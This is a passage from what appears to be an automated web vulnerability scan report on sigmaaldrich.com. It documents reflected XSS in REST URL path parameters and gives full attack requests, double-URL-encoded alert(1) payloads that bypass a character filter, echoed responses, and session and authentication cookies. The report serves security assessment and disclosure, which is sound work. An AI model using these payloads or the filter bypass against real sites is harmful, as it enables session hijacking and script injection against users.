Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:31 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentf4449";alert(1)//a68566a3237/sigma-aldrich/customer-support/customer-service/services/facility-operations","E404") ;
   </script>
...[SNIP]...

1.173. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fc7e%2522%253balert%25281%2529%252f%252f8055ccc3a8 was submitted in the REST URL parameter 2. This input was echoed as 3fc7e";alert(1)//8055ccc3a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich3fc7e%2522%253balert%25281%2529%252f%252f8055ccc3a8/customer-support/customer-service/services/facility-operations HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:32 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich3fc7e";alert(1)//8055ccc3a8/customer-support/customer-service/services/facility-operations","E404") ;
   </script>
...[SNIP]...

1.174. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20793%2522%253balert%25281%2529%252f%252f82ed8dc50c0 was submitted in the REST URL parameter 3. This input was echoed as 20793";alert(1)//82ed8dc50c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support20793%2522%253balert%25281%2529%252f%252f82ed8dc50c0/customer-service/services/facility-operations HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:35 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support20793";alert(1)//82ed8dc50c0/customer-service/services/facility-operations","E404") ;
   </script>
...[SNIP]...

1.175. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4c3f%2522%253balert%25281%2529%252f%252fb627421d8b9 was submitted in the REST URL parameter 4. This input was echoed as b4c3f";alert(1)//b627421d8b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-serviceb4c3f%2522%253balert%25281%2529%252f%252fb627421d8b9/services/facility-operations HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:37 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-serviceb4c3f";alert(1)//b627421d8b9/services/facility-operations","E404") ;
   </script>
...[SNIP]...

1.176. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1da7d%2522%253balert%25281%2529%252f%252f8627ae95de3 was submitted in the REST URL parameter 5. This input was echoed as 1da7d";alert(1)//8627ae95de3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services1da7d%2522%253balert%25281%2529%252f%252f8627ae95de3/facility-operations HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:39 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services1da7d";alert(1)//8627ae95de3/facility-operations","E404") ;
   </script>
...[SNIP]...

1.177. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35457%2522%253balert%25281%2529%252f%252ff3cf851a95a was submitted in the REST URL parameter 6. This input was echoed as 35457";alert(1)//f3cf851a95a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/facility-operations35457%2522%253balert%25281%2529%252f%252ff3cf851a95a HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
